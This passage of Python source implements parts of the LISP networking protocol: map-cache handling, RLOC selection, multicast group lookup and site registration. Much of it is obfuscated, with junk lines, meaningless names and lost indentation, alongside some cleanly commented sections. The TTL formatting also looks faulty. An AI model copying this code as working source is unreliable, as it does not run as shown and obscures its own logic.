if 100 - 100: I11i - I1ii11iIi11i . i1IIi
def print_mapping ( self , eid_indent , rloc_indent ) :
Oo0OO0000oooo = lisp_print_elapsed ( self . uptime )
oOoooOOO0o0 = "" if self . group . is_null ( ) else ", group {}" . format ( self . group . print_prefix ( ) )
if 85 - 85: II111iiii
lprint ( "{}eid {}{}, uptime {}, {} rlocs:" . format ( eid_indent ,
green ( self . eid . print_prefix ( ) , False ) , oOoooOOO0o0 , Oo0OO0000oooo ,
len ( self . rloc_set ) ) )
for OooO0ooO0o0OO in self . rloc_set : OooO0ooO0o0OO . print_rloc ( rloc_indent )
if 58 - 58: i1IIi - OoO0O00 + ooOoO0o
if 6 - 6: IiII % I1IiiI + OoooooooOO * oO0o . iII111i + oO0o
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 4 - 4: I11i % I1IiiI
if 72 - 72: I1IiiI % II111iiii % iII111i / OoOoOO00
def print_ttl ( self ) :
oo0OOoOO0 = self . map_cache_ttl
if ( oo0OOoOO0 == None ) : return ( "forever" )
if 96 - 96: OoOoOO00 % Ii1I
if ( oo0OOoOO0 >= 3600 ) :
if ( ( oo0OOoOO0 % 3600 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 3600 ) + " hours"
else :
oo0OOoOO0 = str ( oo0OOoOO0 * 60 ) + " mins"
if 50 - 50: IiII - II111iiii
elif ( oo0OOoOO0 >= 60 ) :
if ( ( oo0OOoOO0 % 60 ) == 0 ) :
oo0OOoOO0 = str ( oo0OOoOO0 / 60 ) + " mins"
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " secs"
if 10 - 10: OoooooooOO % Ii1I * OOooOOo + IiII * oO0o
else :
oo0OOoOO0 = str ( oo0OOoOO0 ) + " secs"
if 13 - 13: II111iiii
return ( oo0OOoOO0 )
if 14 - 14: i11iIiiIii . IiII
if 70 - 70: Oo0Ooo * OOooOOo + I1Ii111 % OoOoOO00 / O0
def has_ttl_elapsed ( self ) :
if ( self . map_cache_ttl == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . last_refresh_time
if ( o0O0oO0 >= self . map_cache_ttl ) : return ( True )
if 23 - 23: O0 * oO0o / I1IiiI + i1IIi * O0 % oO0o
if 11 - 11: I1Ii111 . OoooooooOO * iIii1I11I1II1 / I1ii11iIi11i - ooOoO0o . iII111i
if 71 - 71: i11iIiiIii + I11i / i11iIiiIii % Oo0Ooo / iIii1I11I1II1 * OoO0O00
if 49 - 49: iII111i + OoOoOO00
if 33 - 33: ooOoO0o
i1111111II = self . map_cache_ttl - ( self . map_cache_ttl / 10 )
if ( o0O0oO0 >= i1111111II ) : return ( True )
return ( False )
if 58 - 58: o0oOOo0O0Ooo
if 5 - 5: O0
def is_active ( self ) :
if ( self . stats . last_increment == None ) : return ( False )
o0O0oO0 = time . time ( ) - self . stats . last_increment
return ( o0O0oO0 <= 60 )
if 23 - 23: OOooOOo . i11iIiiIii % o0oOOo0O0Ooo - OoOoOO00 * OoooooooOO - OoO0O00
if 51 - 51: iIii1I11I1II1 / I1ii11iIi11i
def match_eid_tuple ( self , db ) :
if ( self . eid . is_exact_match ( db . eid ) == False ) : return ( False )
if ( self . group . is_exact_match ( db . group ) == False ) : return ( False )
return ( True )
if 83 - 83: ooOoO0o % I1IiiI - OoOoOO00 - I11i
if 12 - 12: I1Ii111 . OoO0O00 + I11i * OoO0O00 - IiII + I11i
def sort_rloc_set ( self ) :
self . rloc_set . sort ( key = operator . attrgetter ( 'rloc.address' ) )
if 98 - 98: iII111i . I1Ii111 * IiII - Ii1I * OoooooooOO
if 13 - 13: iII111i
def delete_rlocs_from_rloc_probe_list ( self ) :
for OooO0ooO0o0OO in self . best_rloc_set :
OooO0ooO0o0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 76 - 76: iIii1I11I1II1 + Oo0Ooo
if 40 - 40: oO0o % i1IIi % ooOoO0o . oO0o % oO0o
if 69 - 69: OoooooooOO . oO0o / OoooooooOO / OoOoOO00
def build_best_rloc_set ( self ) :
I1iIiI = self . best_rloc_set
self . best_rloc_set = [ ]
if ( self . rloc_set == None ) : return
if 89 - 89: ooOoO0o * Ii1I * Oo0Ooo * O0
if 25 - 25: o0oOOo0O0Ooo + I1ii11iIi11i * oO0o / IiII - Ii1I
if 85 - 85: Oo0Ooo . i11iIiiIii % oO0o
if 60 - 60: OOooOOo
IIii1IiI = 256
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . up_state ( ) ) : IIii1IiI = min ( OooO0ooO0o0OO . priority , IIii1IiI )
if 90 - 90: i11iIiiIii / i1IIi * Oo0Ooo / OoO0O00 * I1ii11iIi11i + I1ii11iIi11i
if 36 - 36: Ii1I . OOooOOo * iIii1I11I1II1 - i1IIi
if 38 - 38: Oo0Ooo . o0oOOo0O0Ooo % oO0o / i11iIiiIii * OoO0O00 % OoOoOO00
if 18 - 18: OOooOOo
if 12 - 12: I1Ii111 % II111iiii / o0oOOo0O0Ooo - iIii1I11I1II1 + II111iiii
if 41 - 41: OOooOOo
if 8 - 8: i11iIiiIii . IiII . I1ii11iIi11i + i1IIi % I1Ii111
if 64 - 64: I1IiiI . Oo0Ooo * OoO0O00
if 87 - 87: i1IIi / OoooooooOO
if 68 - 68: I1Ii111 / iIii1I11I1II1
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . priority <= IIii1IiI ) :
if ( OooO0ooO0o0OO . unreach_state ( ) and OooO0ooO0o0OO . last_rloc_probe == None ) :
OooO0ooO0o0OO . last_rloc_probe = lisp_get_timestamp ( )
if 8 - 8: ooOoO0o * IiII * OOooOOo / I1IiiI
self . best_rloc_set . append ( OooO0ooO0o0OO )
if 40 - 40: i11iIiiIii + OoooooooOO
if 2 - 2: o0oOOo0O0Ooo * OoO0O00
if 88 - 88: Oo0Ooo + oO0o + iII111i
if 51 - 51: i1IIi + i11iIiiIii * I11i / iII111i + OoooooooOO
if 89 - 89: i11iIiiIii - I1Ii111 - O0 % iIii1I11I1II1 / IiII - O0
if 63 - 63: OOooOOo
if 23 - 23: Oo0Ooo / i1IIi - OOooOOo / Oo0Ooo
if 16 - 16: o0oOOo0O0Ooo - iIii1I11I1II1 / OoooooooOO / I1ii11iIi11i + IiII
for OooO0ooO0o0OO in I1iIiI :
if ( OooO0ooO0o0OO . priority < IIii1IiI ) : continue
OooO0ooO0o0OO . delete_from_rloc_probe_list ( self . eid , self . group )
if 73 - 73: OOooOOo % I1Ii111 + OoooooooOO / I1ii11iIi11i * oO0o % oO0o
for OooO0ooO0o0OO in self . best_rloc_set :
if ( OooO0ooO0o0OO . rloc . is_null ( ) ) : continue
OooO0ooO0o0OO . add_to_rloc_probe_list ( self . eid , self . group )
if 25 - 25: I1Ii111
if 93 - 93: OoO0O00
if 62 - 62: Oo0Ooo . iII111i
def select_rloc ( self , lisp_packet , ipc_socket ) :
ii1i1II = lisp_packet . packet
iiI1IIii1IIi1 = lisp_packet . inner_version
iI1 = len ( self . best_rloc_set )
if ( iI1 is 0 ) :
self . stats . increment ( len ( ii1i1II ) )
return ( [ None , None , None , self . action , None , None ] )
if 63 - 63: OoooooooOO % I1Ii111 + IiII / OoooooooOO
if 60 - 60: II111iiii + II111iiii
i1IIIoo0ooO = 4 if lisp_load_split_pings else 0
IiI1I1i1 = lisp_packet . hash_ports ( )
if ( iiI1IIii1IIi1 == 4 ) :
for i1i1IIIIIIIi in range ( 8 + i1IIIoo0ooO ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "B" , ii1i1II [ i1i1IIIIIIIi + 12 ] ) [ 0 ]
if 40 - 40: ooOoO0o % I11i + O0
elif ( iiI1IIii1IIi1 == 6 ) :
for i1i1IIIIIIIi in range ( 0 , 32 + i1IIIoo0ooO , 4 ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "I" , ii1i1II [ i1i1IIIIIIIi + 8 : i1i1IIIIIIIi + 12 ] ) [ 0 ]
if 22 - 22: i1IIi % Oo0Ooo / oO0o % OoOoOO00 / OoOoOO00
IiI1I1i1 = ( IiI1I1i1 >> 16 ) + ( IiI1I1i1 & 0xffff )
IiI1I1i1 = ( IiI1I1i1 >> 8 ) + ( IiI1I1i1 & 0xff )
else :
for i1i1IIIIIIIi in range ( 0 , 12 + i1IIIoo0ooO , 4 ) :
IiI1I1i1 = IiI1I1i1 ^ struct . unpack ( "I" , ii1i1II [ i1i1IIIIIIIi : i1i1IIIIIIIi + 4 ] ) [ 0 ]
if 79 - 79: IiII % OoooooooOO
if 51 - 51: iII111i . oO0o % ooOoO0o % Ii1I . o0oOOo0O0Ooo
if 43 - 43: II111iiii
if ( lisp_data_plane_logging ) :
OOOOo00oo0OO = [ ]
for O0OooO0oo in self . best_rloc_set :
if ( O0OooO0oo . rloc . is_null ( ) ) : continue
OOOOo00oo0OO . append ( [ O0OooO0oo . rloc . print_address_no_iid ( ) , O0OooO0oo . print_state ( ) ] )
if 18 - 18: O0 + I1Ii111 . I1ii11iIi11i
dprint ( "Packet hash {}, index {}, best-rloc-list: {}" . format ( hex ( IiI1I1i1 ) , IiI1I1i1 % iI1 , red ( str ( OOOOo00oo0OO ) , False ) ) )
if 48 - 48: Ii1I . o0oOOo0O0Ooo * O0 / OoooooooOO + I1Ii111 + Oo0Ooo
if 92 - 92: Ii1I - o0oOOo0O0Ooo % I1IiiI + I1Ii111
if 3 - 3: iIii1I11I1II1 + i11iIiiIii
if 49 - 49: OoOoOO00 % iIii1I11I1II1 + I1Ii111
if 38 - 38: i11iIiiIii
if 75 - 75: iIii1I11I1II1 / OoO0O00 * OOooOOo % O0
OooO0ooO0o0OO = self . best_rloc_set [ IiI1I1i1 % iI1 ]
if 82 - 82: Oo0Ooo / i1IIi . i1IIi / oO0o
if 7 - 7: Oo0Ooo . iII111i % I1ii11iIi11i / iII111i
if 93 - 93: iII111i
if 5 - 5: iII111i . I11i % I11i * Ii1I - I1ii11iIi11i . i11iIiiIii
if 32 - 32: II111iiii
oOo0ooO0O0oo = lisp_get_echo_nonce ( OooO0ooO0o0OO . rloc , None )
if ( oOo0ooO0O0oo ) :
oOo0ooO0O0oo . change_state ( OooO0ooO0o0OO )
if ( OooO0ooO0o0OO . no_echoed_nonce_state ( ) ) :
oOo0ooO0O0oo . request_nonce_sent = None
if 58 - 58: I1IiiI - o0oOOo0O0Ooo - I1Ii111 . O0 % OoO0O00 . I11i
if 41 - 41: iII111i . I1Ii111 - IiII / O0
if 62 - 62: IiII * I1ii11iIi11i * iII111i * OoOoOO00
if 12 - 12: Oo0Ooo * Ii1I / ooOoO0o % I11i % O0
if 25 - 25: Oo0Ooo * oO0o
if 78 - 78: OoOoOO00 / II111iiii
if ( OooO0ooO0o0OO . up_state ( ) == False ) :
i1IoO00oo = IiI1I1i1 % iI1
OO000o00 = ( i1IoO00oo + 1 ) % iI1
while ( OO000o00 != i1IoO00oo ) :
OooO0ooO0o0OO = self . best_rloc_set [ OO000o00 ]
if ( OooO0ooO0o0OO . up_state ( ) ) : break
OO000o00 = ( OO000o00 + 1 ) % iI1
if 36 - 36: OoO0O00 . ooOoO0o . O0 / OoO0O00
if ( OO000o00 == i1IoO00oo ) :
self . build_best_rloc_set ( )
return ( [ None , None , None , None , None , None ] )
if 50 - 50: Ii1I . OoOoOO00 * o0oOOo0O0Ooo
if 68 - 68: IiII * oO0o / OoOoOO00 / I1Ii111
if 72 - 72: I1ii11iIi11i
if 74 - 74: I1Ii111 * iIii1I11I1II1 / oO0o - IiII - I1IiiI
if 84 - 84: iIii1I11I1II1 % Oo0Ooo / I1ii11iIi11i + o0oOOo0O0Ooo * II111iiii
if 81 - 81: I1IiiI / I1ii11iIi11i / OOooOOo
OooO0ooO0o0OO . stats . increment ( len ( ii1i1II ) )
if 89 - 89: Oo0Ooo % IiII
if 36 - 36: IiII % OoOoOO00 % I1ii11iIi11i
if 7 - 7: I1ii11iIi11i % OoOoOO00 - O0 . I1Ii111
if 9 - 9: Ii1I . OoooooooOO / ooOoO0o + i1IIi
if ( OooO0ooO0o0OO . rle_name and OooO0ooO0o0OO . rle == None ) :
if ( lisp_rle_list . has_key ( OooO0ooO0o0OO . rle_name ) ) :
OooO0ooO0o0OO . rle = lisp_rle_list [ OooO0ooO0o0OO . rle_name ]
if 90 - 90: oO0o - OoOoOO00 % ooOoO0o
if 83 - 83: OOooOOo - I1ii11iIi11i + OoO0O00
if ( OooO0ooO0o0OO . rle ) : return ( [ None , None , None , None , OooO0ooO0o0OO . rle , None ] )
if 99 - 99: iII111i - OoOoOO00 % ooOoO0o
if 27 - 27: oO0o . oO0o * iII111i % iIii1I11I1II1
if 81 - 81: iII111i * II111iiii
if 28 - 28: i11iIiiIii . Oo0Ooo . Ii1I
if ( OooO0ooO0o0OO . elp and OooO0ooO0o0OO . elp . use_elp_node ) :
return ( [ OooO0ooO0o0OO . elp . use_elp_node . address , None , None , None , None ,
None ] )
if 19 - 19: OoO0O00 - Ii1I + ooOoO0o + OOooOOo
if 84 - 84: iII111i / Oo0Ooo
if 21 - 21: OoO0O00 . I1IiiI - OoO0O00
if 51 - 51: iIii1I11I1II1
if 5 - 5: oO0o - OoOoOO00 . ooOoO0o
O0O0oO0o0 = None if ( OooO0ooO0o0OO . rloc . is_null ( ) ) else OooO0ooO0o0OO . rloc
IIi1I1iII111 = OooO0ooO0o0OO . translated_port
Ii1II1I = self . action if ( O0O0oO0o0 == None ) else None
if 59 - 59: II111iiii % Oo0Ooo * OoOoOO00 + i11iIiiIii . OoO0O00
if 70 - 70: o0oOOo0O0Ooo * O0 * II111iiii
if 38 - 38: OoO0O00 - I1IiiI * OoooooooOO / I11i . O0
if 77 - 77: OOooOOo + oO0o * iIii1I11I1II1 / oO0o / OOooOOo . i11iIiiIii
if 92 - 92: Oo0Ooo . o0oOOo0O0Ooo % OoooooooOO * i11iIiiIii * OoO0O00 * o0oOOo0O0Ooo
OO00OO = None
if ( oOo0ooO0O0oo and oOo0ooO0O0oo . request_nonce_timeout ( ) == False ) :
OO00OO = oOo0ooO0O0oo . get_request_or_echo_nonce ( ipc_socket , O0O0oO0o0 )
if 48 - 48: iII111i * I1ii11iIi11i * oO0o % O0 . OoO0O00
if 11 - 11: OOooOOo / o0oOOo0O0Ooo
if 98 - 98: oO0o + I11i . oO0o
if 10 - 10: iII111i + i1IIi . I11i % ooOoO0o / ooOoO0o
if 86 - 86: Oo0Ooo
return ( [ O0O0oO0o0 , IIi1I1iII111 , OO00OO , Ii1II1I , None , OooO0ooO0o0OO ] )
if 7 - 7: iIii1I11I1II1
if 86 - 86: IiII + iII111i * II111iiii - IiII - o0oOOo0O0Ooo
def do_rloc_sets_match ( self , rloc_address_set ) :
if ( len ( self . rloc_set ) != len ( rloc_address_set ) ) : return ( False )
if 8 - 8: OOooOOo . Ii1I
if 15 - 15: ooOoO0o / OOooOOo + i1IIi / Ii1I / OOooOOo
if 47 - 47: Oo0Ooo + oO0o % OoooooooOO
if 23 - 23: I1Ii111 / i11iIiiIii - ooOoO0o * iII111i - Ii1I . iIii1I11I1II1
if 11 - 11: I11i % OoOoOO00 * Oo0Ooo
for IiIIIi in self . rloc_set :
for OooO0ooO0o0OO in rloc_address_set :
if ( OooO0ooO0o0OO . is_exact_match ( IiIIIi . rloc ) == False ) : continue
OooO0ooO0o0OO = None
break
if 48 - 48: OOooOOo
if ( OooO0ooO0o0OO == rloc_address_set [ - 1 ] ) : return ( False )
if 66 - 66: iII111i - I1Ii111 - i11iIiiIii . o0oOOo0O0Ooo + Oo0Ooo
return ( True )
if 90 - 90: O0 - i11iIiiIii * ooOoO0o . I1ii11iIi11i . Ii1I - OoooooooOO
if 23 - 23: o0oOOo0O0Ooo
def get_rloc ( self , rloc ) :
for IiIIIi in self . rloc_set :
O0OooO0oo = IiIIIi . rloc
if ( rloc . is_exact_match ( O0OooO0oo ) ) : return ( IiIIIi )
if 88 - 88: I1Ii111 + iIii1I11I1II1 / o0oOOo0O0Ooo
return ( None )
if 93 - 93: ooOoO0o % iIii1I11I1II1 - OOooOOo . IiII + ooOoO0o
if 63 - 63: I1ii11iIi11i / OOooOOo
def get_rloc_by_interface ( self , interface ) :
for IiIIIi in self . rloc_set :
if ( IiIIIi . interface == interface ) : return ( IiIIIi )
if 28 - 28: I11i / I1Ii111 + IiII * OoooooooOO - iIii1I11I1II1
return ( None )
if 6 - 6: I11i % o0oOOo0O0Ooo / OoooooooOO . I1Ii111
if 17 - 17: I1ii11iIi11i + OoooooooOO / iIii1I11I1II1 . II111iiii + Oo0Ooo
def add_db ( self ) :
if ( self . group . is_null ( ) ) :
lisp_db_for_lookups . add_cache ( self . eid , self )
else :
o00o0oOo0o0O = lisp_db_for_lookups . lookup_cache ( self . group , True )
if ( o00o0oOo0o0O == None ) :
o00o0oOo0o0O = lisp_mapping ( self . group , self . group , [ ] )
lisp_db_for_lookups . add_cache ( self . group , o00o0oOo0o0O )
if 7 - 7: O0 - I1ii11iIi11i - iIii1I11I1II1
o00o0oOo0o0O . add_source_entry ( self )
if 96 - 96: OoOoOO00 . I1IiiI . I11i * OoooooooOO + OoooooooOO * O0
if 90 - 90: I11i + I1ii11iIi11i + OoooooooOO + OoOoOO00 + IiII / iII111i
if 75 - 75: i11iIiiIii
def add_cache ( self , do_ipc = True ) :
if ( self . group . is_null ( ) ) :
lisp_map_cache . add_cache ( self . eid , self )
if ( lisp_program_hardware ) : lisp_program_vxlan_hardware ( self )
else :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( OoOoooooO00oo == None ) :
OoOoooooO00oo = lisp_mapping ( self . group , self . group , [ ] )
OoOoooooO00oo . eid . copy_address ( self . group )
OoOoooooO00oo . group . copy_address ( self . group )
lisp_map_cache . add_cache ( self . group , OoOoooooO00oo )
if 27 - 27: I11i - IiII - I1Ii111
if ( self . eid . is_null ( ) ) : self . eid . make_default_route ( OoOoooooO00oo . group )
OoOoooooO00oo . add_source_entry ( self )
if 90 - 90: OoO0O00 . oO0o * O0 / I11i % O0 + I1Ii111
if ( do_ipc ) : lisp_write_ipc_map_cache ( True , self )
if 48 - 48: iIii1I11I1II1 . i11iIiiIii / OoooooooOO . i1IIi . o0oOOo0O0Ooo
if 84 - 84: Ii1I
def delete_cache ( self ) :
self . delete_rlocs_from_rloc_probe_list ( )
lisp_write_ipc_map_cache ( False , self )
if 92 - 92: I11i
if ( self . group . is_null ( ) ) :
lisp_map_cache . delete_cache ( self . eid )
if ( lisp_program_hardware ) :
O000 = self . eid . print_prefix_no_iid ( )
os . system ( "ip route delete {}" . format ( O000 ) )
if 79 - 79: O0 / IiII . i1IIi - i1IIi + i1IIi
else :
OoOoooooO00oo = lisp_map_cache . lookup_cache ( self . group , True )
if ( OoOoooooO00oo == None ) : return
if 47 - 47: iII111i - I1Ii111 - I1Ii111 . ooOoO0o
iII1oO0OOoOOo0 = OoOoooooO00oo . lookup_source_cache ( self . eid , True )
if ( iII1oO0OOoOOo0 == None ) : return
if 53 - 53: iII111i + oO0o % O0
OoOoooooO00oo . source_cache . delete_cache ( self . eid )
if ( OoOoooooO00oo . source_cache . cache_size ( ) == 0 ) :
lisp_map_cache . delete_cache ( self . group )
if 92 - 92: O0 / iIii1I11I1II1
if 72 - 72: o0oOOo0O0Ooo / iII111i - I1ii11iIi11i . II111iiii
if 95 - 95: II111iiii / I11i / ooOoO0o - I1Ii111 % i11iIiiIii
if 53 - 53: iII111i
def add_source_entry ( self , source_mc ) :
if ( self . source_cache == None ) : self . source_cache = lisp_cache ( )
self . source_cache . add_cache ( source_mc . eid , source_mc )
if 45 - 45: OOooOOo * I1IiiI / oO0o . Ii1I - OoO0O00 % OOooOOo
if 40 - 40: I11i
def lookup_source_cache ( self , source , exact ) :
if ( self . source_cache == None ) : return ( None )
return ( self . source_cache . lookup_cache ( source , exact ) )
if 69 - 69: OoOoOO00 + OoOoOO00 + o0oOOo0O0Ooo / iIii1I11I1II1 * OoO0O00
if 44 - 44: II111iiii / o0oOOo0O0Ooo
def dynamic_eid_configured ( self ) :
return ( self . dynamic_eids != None )
if 81 - 81: I1Ii111 . Ii1I * ooOoO0o . IiII - OoOoOO00
if 79 - 79: ooOoO0o - O0
def star_secondary_iid ( self , prefix ) :
if ( self . secondary_iid == None ) : return ( prefix )
oOo00Ooo0o0 = "," + str ( self . secondary_iid )
return ( prefix . replace ( oOo00Ooo0o0 , oOo00Ooo0o0 + "*" ) )
if 56 - 56: ooOoO0o
if 89 - 89: O0 % iIii1I11I1II1 / OoOoOO00 - I1Ii111 - I1IiiI
def increment_decap_stats ( self , packet ) :
IIi1I1iII111 = packet . udp_dport
if ( IIi1I1iII111 == LISP_DATA_PORT ) :
OooO0ooO0o0OO = self . get_rloc ( packet . outer_dest )
else :
if 60 - 60: IiII % i11iIiiIii / OOooOOo
if 43 - 43: i11iIiiIii * II111iiii + ooOoO0o - OoooooooOO * II111iiii / OoO0O00
if 92 - 92: O0 - ooOoO0o % iII111i
if 83 - 83: I1ii11iIi11i / OoOoOO00 % OoooooooOO
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . translated_port != 0 ) : break
if 54 - 54: I11i / I1IiiI * IiII - iII111i
if 37 - 37: i1IIi * I1Ii111 / I11i * II111iiii + OoooooooOO . OoO0O00
if ( OooO0ooO0o0OO != None ) : OooO0ooO0o0OO . stats . increment ( len ( packet . packet ) )
self . stats . increment ( len ( packet . packet ) )
if 22 - 22: OoOoOO00 + OoooooooOO - I1Ii111
if 82 - 82: Ii1I % I1Ii111 / ooOoO0o
def rtrs_in_rloc_set ( self ) :
for OooO0ooO0o0OO in self . rloc_set :
if ( OooO0ooO0o0OO . is_rtr ( ) ) : return ( True )
if 86 - 86: II111iiii - iIii1I11I1II1 + oO0o + I1IiiI
return ( False )
if 29 - 29: Ii1I % OoooooooOO * II111iiii
if 88 - 88: I1Ii111 + I11i + I1Ii111 % OoO0O00 / I1ii11iIi11i - I11i
if 15 - 15: Oo0Ooo - i1IIi
class lisp_dynamic_eid():
    """A dynamically discovered EID and the interface it was learned on."""

    def __init__(self):
        self.dynamic_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
        self.uptime = lisp_get_timestamp()
        self.interface = None
        self.last_packet = None
        self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT

    def get_timeout(self, interface):
        """Set self.timeout from the interface's configured dynamic-EID
        timeout, falling back to the default when unavailable."""
        try:
            self.timeout = lisp_myinterfaces[interface].dynamic_eid_timeout
        except:    # deliberate best-effort: unknown interface keeps default
            self.timeout = LISP_DEFAULT_DYN_EID_TIMEOUT
if 25 - 25: iII111i % iII111i * ooOoO0o % I1ii11iIi11i % I1Ii111
if 4 - 4: O0 % i11iIiiIii % I1Ii111 - i11iIiiIii / o0oOOo0O0Ooo % o0oOOo0O0Ooo
if 59 - 59: i1IIi . o0oOOo0O0Ooo . IiII + iII111i * i1IIi
if 41 - 41: ooOoO0o - i1IIi * IiII . OoOoOO00 % iIii1I11I1II1 - IiII
class lisp_group_mapping():
    """Configuration for one multicast group-mapping entry."""

    def __init__(self, group_name, ms_name, group_prefix, sources, rle_addr):
        self.group_name = group_name
        self.group_prefix = group_prefix
        self.use_ms_name = ms_name
        self.sources = sources
        self.rle_address = rle_addr

    def add_group(self):
        """Register this mapping in the global group-mapping table."""
        lisp_group_mapping_list[self.group_name] = self
if 67 - 67: i1IIi + i11iIiiIii * I1ii11iIi11i / ooOoO0o * OoO0O00
if 52 - 52: II111iiii / Ii1I - iII111i
if 33 - 33: I1IiiI
if 41 - 41: OoOoOO00 * i1IIi
if 94 - 94: I11i
if 28 - 28: OOooOOo
if 82 - 82: II111iiii
if 66 - 66: iII111i % I1Ii111 * oO0o
if 81 - 81: i11iIiiIii - O0 . iIii1I11I1II1 - I11i + iIii1I11I1II1
if 50 - 50: Oo0Ooo . OoO0O00 + i11iIiiIii / i11iIiiIii
def lisp_is_group_more_specific(group_str, group_mapping):
    """Return group_mapping's prefix mask-length when the IPv4 group address
    group_str lies within group_mapping.group_prefix, else -1."""
    prefix = group_mapping.group_prefix
    group = lisp_address(LISP_AFI_IPV4, group_str, 32, prefix.instance_id)
    if (group.is_more_specific(prefix)): return(prefix.mask_len)
    return(-1)
if 27 - 27: OoOoOO00 - OoOoOO00 % II111iiii + i1IIi + I1IiiI
if 75 - 75: OoooooooOO . I11i - OoOoOO00
if 93 - 93: OoOoOO00 . I1Ii111 % I1ii11iIi11i
if 58 - 58: OoooooooOO . i1IIi . Oo0Ooo - o0oOOo0O0Ooo / oO0o * I1Ii111
if 6 - 6: oO0o - OoO0O00
if 44 - 44: Oo0Ooo + I1ii11iIi11i % Oo0Ooo / I11i
if 57 - 57: Oo0Ooo + Ii1I * OoooooooOO
def lisp_lookup_group(group):
    """Longest-match lookup of a multicast group address against the global
    group-mapping table; returns the best entry or None."""
    best = None
    for mapping in list(lisp_group_mapping_list.values()):
        mask_len = lisp_is_group_more_specific(group, mapping)
        if (mask_len == -1): continue
        if (best == None or mask_len > best.group_prefix.mask_len):
            best = mapping
    return(best)
if 14 - 14: OOooOOo * Oo0Ooo - o0oOOo0O0Ooo + iIii1I11I1II1 / ooOoO0o % iIii1I11I1II1
if 4 - 4: OoOoOO00 / Oo0Ooo - OoO0O00 . OoOoOO00 / I1Ii111
# Flag-letter legend for site registrations (used by lisp_site_eid.
# print_flags): the '{}' is filled with "" when the flag letter is
# uppercase (set) or "not " when lowercase (clear).
lisp_site_flags = {
"P" : "ETR is {}Requesting Map-Server to Proxy Map-Reply" ,
"S" : "ETR is {}LISP-SEC capable" ,
"I" : "xTR-ID and site-ID are {}included in Map-Register" ,
"T" : "Use Map-Register TTL field to timeout registration is {}set" ,
"R" : "Merging registrations are {}requested" ,
"M" : "ETR is {}a LISP Mobile-Node" ,
"N" : "ETR is {}requesting Map-Notify messages from Map-Server"
}
if 60 - 60: OOooOOo * I1Ii111
class lisp_site ( ) :
 """A Map-Server site configuration entry: authentication material,
 allowed prefixes/RLOCs, and Map-Notify counters."""
 def __init__ ( self ) :
  self . site_name = ""
  self . description = ""
  self . shutdown = False
  # Authentication material (key dict is keyed per configured key).
  self . auth_sha1_or_sha2 = False
  self . auth_key = { }
  self . encryption_key = None
  # Registration policy restrictions.
  self . allowed_prefixes = { }
  self . allowed_prefixes_sorted = [ ]
  self . allowed_rlocs = { }
  # Map-Notify bookkeeping.
  self . map_notifies_sent = 0
  self . map_notify_acks_received = 0
if 17 - 17: iII111i * I11i / iIii1I11I1II1 - II111iiii
if 97 - 97: II111iiii * o0oOOo0O0Ooo
if 13 - 13: o0oOOo0O0Ooo . II111iiii
class lisp_site_eid ( ) :
 def __init__ ( self , site ) :
  """Per-EID-prefix registration state belonging to a lisp_site entry."""
  self . site = site
  self . eid = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  self . group = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  # Registration history and liveness.
  self . first_registered = 0
  self . last_registered = 0
  self . last_registerer = lisp_address ( LISP_AFI_NONE , "" , 0 , 0 )
  self . register_ttl = LISP_SITE_TIMEOUT_CHECK_INTERVAL * 3
  self . registered = False
  self . registered_rlocs = [ ]
  self . auth_sha1_or_sha2 = False
  # Per-xTR registrations that are merged into this entry.
  self . individual_registrations = { }
  self . map_registers_received = 0
  # Flags copied from the Map-Register message (see print_flags).
  self . proxy_reply_requested = False
  self . force_proxy_reply = False
  self . force_nat_proxy_reply = False
  self . force_ttl = None
  self . pitr_proxy_reply_drop = False
  self . proxy_reply_action = ""
  self . lisp_sec_present = False
  self . map_notify_requested = False
  self . mobile_node_requested = False
  self . echo_nonce_capable = False
  self . use_register_ttl_requested = False
  self . merge_register_requested = False
  self . xtr_id_present = False
  self . xtr_id = 0
  self . site_id = 0
  # Accept-more-specifics (AMS) support.
  self . accept_more_specifics = False
  self . parent_for_more_specifics = None
  self . dynamic = False
  self . more_specific_registrations = [ ]
  self . source_cache = None
  self . inconsistent_registration = False
  self . policy = None
  self . require_signature = False
if 76 - 76: II111iiii + I1Ii111 . OoooooooOO / IiII % i11iIiiIii
if 87 - 87: Ii1I / OoOoOO00 / OOooOOo
def print_eid_tuple ( self ) :
return ( lisp_print_eid_tuple ( self . eid , self . group ) )
if 11 - 11: o0oOOo0O0Ooo * OoO0O00 . o0oOOo0O0Ooo - I1IiiI / IiII - OOooOOo
if 19 - 19: i1IIi + IiII . OoO0O00 / O0 - I1Ii111 - Oo0Ooo
def print_flags ( self , html ) :
if ( html == False ) :
o0OooooOoOO = "{}-{}-{}-{}-{}-{}-{}" . format ( "P" if self . proxy_reply_requested else "p" ,
# Oo0Ooo / iII111i
"S" if self . lisp_sec_present else "s" ,
"I" if self . xtr_id_present else "i" ,
"T" if self . use_register_ttl_requested else "t" ,
"R" if self . merge_register_requested else "r" ,
"M" if self . mobile_node_requested else "m" ,
"N" if self . map_notify_requested else "n" )
else :
iIiI1 = self . print_flags ( False )
iIiI1 = iIiI1 . split ( "-" )
o0OooooOoOO = ""
for iIIii1IiIIiI in iIiI1 :
iiI = lisp_site_flags [ iIIii1IiIIiI . upper ( ) ]
iiI = iiI . format ( "" if iIIii1IiIIiI . isupper ( ) else "not " )
o0OooooOoOO += lisp_span ( iIIii1IiIIiI , iiI )
if ( iIIii1IiIIiI . lower ( ) != "n" ) : o0OooooOoOO += "-"
if 76 - 76: iII111i - II111iiii % Oo0Ooo . I1Ii111
if 64 - 64: OoO0O00 - OoO0O00
return ( o0OooooOoOO )
if 93 - 93: Oo0Ooo . O0
if 75 - 75: iII111i * II111iiii - I1IiiI
def copy_state_to_parent ( self , child ) :
self . xtr_id = child . xtr_id
self . site_id = child . site_id
